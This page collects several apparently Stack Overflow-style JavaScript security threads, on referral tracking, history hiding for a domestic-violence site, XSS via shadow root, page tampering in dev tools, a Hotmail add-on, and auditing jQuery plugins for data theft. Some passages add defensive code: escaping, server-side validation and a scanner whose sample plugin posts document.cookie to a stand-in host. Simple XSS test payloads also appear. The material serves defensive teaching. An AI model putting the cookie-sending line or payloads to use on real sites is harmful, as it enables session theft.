Access to global JS variables without owning the page - javascript

overflow community,
I've read several posts trying to solve the problem, but they don't answer my question.
Is there any legal way to find out what events (?) another site sends?
I don't ask because of illegal business, and I am ready to find out more myself as soon as I know what I really have to look for in terms of topic and methods.
In particular it's about advertising and finding out if someone registered on another site via a referral link. Like a sign that is sent as soon as the registration (on the other site which is not mine) is completed.
I want to find this out during the visit of the client on my site.
I just need to know if such a thing is legally possible and what JS topics I should give a go to find out more.
I hope my post is comprehensible enough. :)
edit: It's not about global variables.

You can use your browser's developer tools to see what's happening behind your back while you're visiting a web page (I recommend Firebug in Firefox). Alternatively, you may use a network spoofer like Wireshark to capture the traffic from the browser and analyze it in any way.
It's all up to you to find the information you think is relevant inside it in URLs, in request headers and bodies, etc. In your case, this would include script-generated content and referral codes that may help keeping track of a user's browsing history across domains.
You don't really need Javascript knowledge to do this, but you need some basics about networking protocols.
This is probably as illegal as using a text editor, but just ask your lawyer if you're unsure :D

Related

Remove specific pages from browser history and back button with javascript?

Situation:
I have a sensitive website about domestic violence with an EXIT button that directly links to Google. So that anyone visiting that website can quickly jump to Google if the visitor feels unsafe or uncomfortable.
I would love to be able to clear any references to this website from both the history list and the back button functionality. Basically, remove any proof of visiting that website. Keep in mind that not all people know how to browse anonymously and some people just cannot even get out of the house to browse the internet. Yes, this scenario is for seriously bad situations.
I've tried using location.replace instead of regular links to keep them from being saved into the history, but they just keep being saved in the history.
I've also tried to use browser.history.deleteUrl({url:"https://thewebsite"}), but this gives an error about browser being undefined.
Is this even possible from a website? Or are there other options?
Thanks for thinking with me!
As you state in the question, you can use window.location.replace() to prevent your site from appearing in the window’s history (back button). Of course, this only works if your site had only one entry in the window’s history to begin with.
As you also state, there is a bigger problem: this does not prevent the site from appearing in the browser’s history. I believe you cannot solve this problem with scripts on your website: you need some external solution, like a browser extension.
(This does not really answer your question, but you could try using URLs and titles that disguise the nature of your site. I have heard of that being done with this sort of resource.)
In response to my idea of disguises, someone asked for examples and asked about discoverability. I was referring to the Aspire News App, featured on Dr Phil’s TV show. On that show, they made a big deal out of not showing what the app looked like, to avoid tipping off abusers. They also said the app is disguised as an ordinary app.
When I was researching this answer, I learned that disguises are indeed a terrible idea. I had no trouble finding information about the app online, and one review said the app is “pointless” because “with all of the media coverage this app has gotten abusers know exactly what it is and what to look for”.
I also learned that the app still had a fundamental security flaw 7 years after it was released. This shows that even supposedly reputable apps, dealing with sensitive matters, cannot be trusted. And perhaps it means that supposedly reputable websites looking to hide themselves from the browser’s history cannot be trusted either.

Breach injection through shadow root

I'm not a JS programmer. I don't have enough skill to test it myself, so asking for help.
Is it possible to inject script or HTML tag into shadow_root element to check for holes on web?
For example <script>alert("alert");</script>
Maybe something else like by using <content>?
Main question: Is it possible or not?
And additional question: How?
According to what I could dig up in comments, you want to know if your users can inject code in your website pages. The answer is yes, the user has all the rights to play with the DOM in front of him. The easy way is by simply opening your favorite browser's developers' tools.
Do it yourself... Open your developer's tools window here, reach the console and write
document.write("<script>alert(\"alert\");</script>");
As you can see, you can change anything even directly on StackOverflow. But that causes absolutely no harm to others, just you. While you can do that on SO does mean that it is insecure at all! It is just that your browser has full control on what it received...
Now, the question should be more how can I detect possible points in my application where such injection can be harmful.
The answer is simple: never trust client input. The server should always validate the inputs, and make sure there is no database injection possible. When displaying user-provided content, one should also make sure there is no hidden code tag that would be run by the browser of the users looking at the webpage.
StackOverflow is not suited for this kind of knowledge sharing. I suggest you read about website security in general and then find more in depth resources related to your technology stack and the usage you have with your users' input.
Also, if you are asking this for a real job task you have been given, the most important thing to do would be to tell your manager you are not fit for the task. Not because you lack the talent, but because you lack the knowledge. This shows that you are smart enough to see the task as very important (security IS very important) and you are not willing to play with the company's reputation.
See workplace.stackexchange.com if you'd like to know how to best explain that to your superiors.
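An added example, not part of the original answer: one way to apply the "never trust client input" advice on the server, with input validation on the way in and output encoding when user-provided content is displayed. The function names and the comment record shape (author, website, text) are assumptions made for illustration.

```javascript
// Added example, not from the original answer. Function names and the
// comment record shape (author, website, text) are hypothetical.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Server-side input validation: reject instead of trying to "clean" bad input.
function validateComment(input) {
  const errors = [];
  if (input === null || typeof input !== 'object') return ['comment must be an object'];
  for (const field of ['author', 'website', 'text']) {
    if (typeof input[field] !== 'string') errors.push(`${field} must be a string`);
  }
  if (typeof input.author === 'string' && !/^[\w .-]{1,40}$/.test(input.author)) {
    errors.push('author has unexpected characters or length');
  }
  if (typeof input.text === 'string' && input.text.length > 2000) errors.push('text too long');
  return errors;
}

// Escaping does not stop a link whose scheme runs script; allow only http(s).
function safeHref(url) {
  try {
    const parsed = new URL(String(url));
    return ['http:', 'https:'].includes(parsed.protocol) ? parsed.href : '#';
  } catch (err) {
    return '#';
  }
}

// Output encoding happens at render time, for every user-supplied field.
function renderComment(comment) {
  return '<article class="comment">' +
    `<a href="${escapeHtml(safeHref(comment.website))}">${escapeHtml(comment.author)}</a>` +
    `<p>${escapeHtml(comment.text)}</p></article>`;
}
```

With this in place the tag from the question is displayed as literal text instead of being parsed by other visitors' browsers.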

hidden class can be edited using console window. how to prevent someone to do this? [duplicate]

I would like to know if there is a way to prevent an html page with jQuery or javascript to be modified by the user to change its behavior.
A user can modify it using tools such as FireBug or the Google Chrome developer bar to hide or show divs, add event listeners to page elements and so on.
I've seen some web pages showing a blocking div when the page is loaded and a pop-up telling to answer some question. If you answer it, the div hides and you can see the page normally.
But if you try to hide the blocking div using FireBug, the page reloads and there is no way to see the page correctly if you don't answer the question asked in the pop-up.
I want to know how could I prevent user from doing such things.
Thanks a lot.
It is not possible (which is a very good thing).
To defeat the method described in the question:
You can use the keyboard shortcuts to the console/tools (Ctrl+Shift+I in Chrome)
You can use the resource/net panel to see the source
You can see it at any other level, e.g. Fiddler
You can use a bookmarklet for easier access
No, you can't prevent people seeing or modifying your source/script if they want to... the ones you most want to prevent are the most able to circumvent any deterrent (and that's all anything you do is, a deterrent, not a stop) you put in place.
The only way to do it (in my opinion) is not have the page content load until the user does your desired action. After he answers the question (or whatever) you send an AJAX request for the content (of course, as thejh said, you should also validate the answer on the server, preferably in the same request). So you load page header, banners and anything not critical, but the actual content (say an article on a blog) should not be loaded until the user does your action.
Everything that a user's browser receives belongs to the user, so you can't enforce anything on that.
For sure you can't prevent anybody from doing what he wants to, but you can make changes more difficult.
Take a look at the DOMEvents, especially the Mutation-Events.
Those give you the ability to see when something has changed (attributes, removed/inserted nodes, data in text nodes ...). For example you could build a function that watches some special attributes you wouldn't want to get changed and reload the page, if this happens.
As others have already said, it isn't possible to control what the end user does with data you've sent them.
It may be possible to detect the console object that Firebug and others use, but what can your site do with that information once you've got it? You can't disable firebug or prevent it from being used, or even know whether it has been used.
The bottom line is that once the web page and JavaScript code have been sent to the browser, it is out of your control.
The closest you can get to what you want is to move some of your code out of Javascript and to the server, where it will be untouchable by the user. However you'll still have to have some client-side code, which will still be at the mercy of malicious users.
The other alternative is to move to Flash or something similar, where the end user doesn't have direct access to the code or the object model. This has its own downsides though, and you'd be bucking the trend, which is to move away from Flash toward HTML5 and Javascript.
It's impossible. When you send code to the client, the client can look at it and modify it. Only code that runs on your server is protected against that.
I don't think it's possible to do that unless you can make sure (or force) users to use browsers that don't have developer tool.
Use ajax to get remote information; don't send the user all the information, such as answers to polls etc. Get the answer from the server after he has picked a choice, using ajax for example. Client-side validation is never a good thing; hell, that's how I used to delete other stupid people's databases. Unless people learn properly how things REALLY work, they should get taught the hard way, such as losing everything in a case of root access vulnerability.
I don't know why HTML has to be blocked; it hasn't been blocked since browsers came out. Hell, I could make my own browser with a socket and get HTML transferred right to some textbox and see it in my favorite notepad/editor etc.
As for javascript, you can simply send javascript commands in the browser address bar (how convenient of browsers in supporting hackers hehe, but it's also used for inter-op communication with other technologies such as flash, so it has an evil/good side to it as everything.)
If you didn't know you can just do
javascript: alert('hi');
or if your javascript game or whatever has globally scoped variables you can modify em easily
javascript: score=9999;damage=99999;
etc etc. Like I said, it's all good, it weeds out the bad programmers and gets em fired or teaches em a lesson in the future.
I've seen many big sites still fall to a SIMPLE XSS attack (Cross-site scripting) which is just baffling how these programmers get a job, I'd do a better interview or some shit it's ridiculous
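An added example, not part of the original answers: one way to implement what several answers in this thread recommend, keeping both the gated content and the answer check on the server so that nothing worth un-hiding ever reaches the browser early. The question, article text, `/unlock` route, attempt limit and session handling are assumptions made for illustration.

```javascript
// Added example, not from the thread. All names and data are constructed.
const QUESTION = { id: 'q1', text: 'What is 6 x 7?', expected: '42' };
const ARTICLE = '<p>Full article text, sent only after a correct answer.</p>';
const MAX_ATTEMPTS = 5;
const attempts = new Map(); // sessionId -> failed attempts so far

// First page load: the question only. There is no hidden div to reveal in dev tools.
function initialPage() {
  return { question: { id: QUESTION.id, text: QUESTION.text } };
}

// Decide the response for POST /unlock. Returns { status, body }.
function handleUnlock(sessionId, rawBody) {
  let data;
  try { data = JSON.parse(rawBody); } catch (err) {
    return { status: 400, body: { error: 'invalid JSON' } };
  }
  if (data === null || typeof data !== 'object' ||
      typeof data.answer !== 'string' || data.answer.length > 100) {
    return { status: 400, body: { error: 'invalid request' } };
  }
  const failed = attempts.get(sessionId) || 0;
  if (failed >= MAX_ATTEMPTS) {
    return { status: 429, body: { error: 'too many attempts' } };
  }
  if (data.questionId !== QUESTION.id || data.answer.trim() !== QUESTION.expected) {
    attempts.set(sessionId, failed + 1);
    return { status: 403, body: { error: 'wrong answer' } };
  }
  attempts.delete(sessionId);
  return { status: 200, body: { content: ARTICLE } };
}

// Minimal wiring with Node's built-in http module; call serve(8080) to run it.
function serve(port) {
  const http = require('http');
  return http.createServer((req, res) => {
    if (req.method !== 'POST' || req.url !== '/unlock') { res.writeHead(404); return res.end(); }
    let raw = '';
    req.on('data', (chunk) => { raw += chunk; if (raw.length > 4096) req.destroy(); });
    req.on('end', () => {
      // Assumption: a real app uses a session cookie; the remote address stands in here.
      const out = handleUnlock(req.socket.remoteAddress, raw);
      res.writeHead(out.status, { 'Content-Type': 'application/json' });
      res.end(JSON.stringify(out.body));
    });
  }).listen(port);
}
```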

XUL: Accessing Hotmail Message sender field. Modify its appearance

I am new to Add-on development.
I am writing a Firefox extension for Hotmail using XUL tutorial. My knowledge of Javascript is pretty limited. My Firefox extension must do the following:
When the user opens a received message in MSN Hotmail to read it, locate and read the sender's email address.
Verify whether this email address is on a list. The list is stored in a simple text file in the local file system. The Add-on must read the list into memory. (I've read this is difficult with Javascript due to security concerns).
Depending on whether the address is in the list, modify the appearance of the "sender" field (I was thinking of changing the background color to green if it exists and red if it does not). The list is supposed to be a group of "secure" senders.
I don't want to use other Add-ons like Greasemonkey, since I believe it would be overkill and I want to learn how this would be done behind curtains.
Any general guides or pointers to specific documents which would help me understand how to achieve all this would be REALLY appreciated.
Which mechanism is best to perform the text-file-reading part? I've read about FileReader objects, or fopen() function, XMLHttpRequest(), and I am confused which is the best route. The file is guaranteed to be a simple text stored in the local filesystem.
I have been looking through the documentation and so far I have only a limited Add-on with a listener that can display a message when a page is loaded. If somebody can help me narrow my search I would be grateful.
Thanks and regards!
You have a couple of questions in there.
The best place to reference when developing an addon is MDN. You may also find help here on Stackoverflow's previous answers, and probably the best way to learn is to find an addon that does something similar to what you are doing, see the source code and see how they did it.
For reading/writing to a file, you can check this question on that matter.
Having that, you have to make sure you are on the desired page. You can get the current tab url with:
gBrowser.currentURI.spec
Then you see if the element that you are trying to style is on the page (meaning you are on the message window), and then you style it the way you want.
Hope this gives you some idea, but to get better and faster answers for next time, try to isolate a problem and ask a specific question about it. The scope of this question is a bit broad.

How can we find the downloaded jquery plugin trying to connect to its developers site?

I am usually downloading several jQuery plugins.
How can I check whether the script is stealing any information (such as user cookie, session id..) and sending to its developer's server?
In php, we are checking backdoor scripts by looking for some functions (system, passthru, shell_exec, etc). Is there any such type of function in JavaScript to connect to its developers site?
Obviously, your first step should be to read the code. There are a number of tell-tale signs you can look for, including looking for URLs in the code, and any encrypted code.
Of course, some code may be too complex to make this a realistic suggestion, particularly if it's been minified and obfuscated, but it should be possible to scan through it. If it is doing anything like this, it'll be using the same functions it uses to communicate with your own site (ie jQuery's ajax functions), so you won't see specific function calls that raise suspicion, but suspect URLs in the code should be checked out, and you should definitely avoid encrypted code (obfuscated is generally okay, but not encrypted).
Secondly, search the internet for other people commenting about the plugin. If there is anything untoward happening, it's likely that other people will have noticed it. Avoid using plugins that don't have enough users to get any comments one way or the other.
Finally, use a tool like Firebug to watch for HTTP requests that occur while you're using a site containing the plugin. If it's communicating with base, it can't hide from you; the browser's debugging tools will happily show you what you need to know.
Hope that helps.
I don't think you can do anything else than read the whole code, and check if it is stealing anything.
Another thing you could do is to search the code for words like 'document.cookie' and 'navigator' and other things that are necessary for stealing information.
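An added example, not part of the original answers: a first-pass static scan for the signs both answers mention (URLs in the code, `document.cookie`, `navigator`), extended here with network calls and dynamic code execution. The rule set, function names and the sample plugin source are constructed for illustration.

```javascript
// Added example, not from the original answers. Rule names and the sample
// plugin source are constructed for illustration.
const RULES = [
  { id: 'cookie-access', re: /document\s*\.\s*cookie/ },
  { id: 'storage-access', re: /\b(?:local|session)Storage\b/ },
  { id: 'fingerprinting', re: /\bnavigator\s*\.\s*\w+/ },
  { id: 'network-call', re: /\$\s*\.\s*(?:ajax|get|post|getJSON)\s*\(|\bXMLHttpRequest\b|\bfetch\s*\(|\bsendBeacon\s*\(|new\s+Image\b/ },
  { id: 'dynamic-code', re: /\beval\s*\(|new\s+Function\s*\(|\batob\s*\(|String\s*\.\s*fromCharCode/ },
  { id: 'hard-coded-url', re: /(?:https?:)?\/\/[a-z0-9.-]+\.[a-z]{2,}[^\s'"]*/i },
];

// Returns [{ line, rule, text }] for every rule that matches a line.
function scanSource(source, allowedHosts = []) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    for (const rule of RULES) {
      const m = rule.re.exec(text);
      if (!m) continue;
      if (rule.id === 'hard-coded-url') {
        const host = m[0].replace(/^(?:https?:)?\/\//i, '').split(/[/:?#]/)[0].toLowerCase();
        if (allowedHosts.includes(host)) continue; // e.g. your own API or CDN
      }
      findings.push({ line: i + 1, rule: rule.id, text: text.trim().slice(0, 120) });
    }
  });
  return findings;
}

// Review first the plugins that both read client data and talk to the network.
function needsReview(findings) {
  const ids = new Set(findings.map((f) => f.rule));
  const readsData = ids.has('cookie-access') || ids.has('storage-access');
  const sendsData = ids.has('network-call') || ids.has('hard-coded-url');
  return readsData && sendsData;
}

// Constructed sample input: a tooltip plugin with two lines that do not belong.
const SAMPLE_PLUGIN = [
  '(function ($) {',
  '  $.fn.tooltipLite = function () { return this.attr("title", "hi"); };',
  '  var c = document.cookie;',
  '  $.post("//stats.example.invalid/c", { d: c });',
  '})(jQuery);',
].join('\n');
```

Minified or obfuscated code can hide every one of these strings, so a clean scan does not replace watching the plugin's HTTP requests in the browser's network panel, as the first answer suggests.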
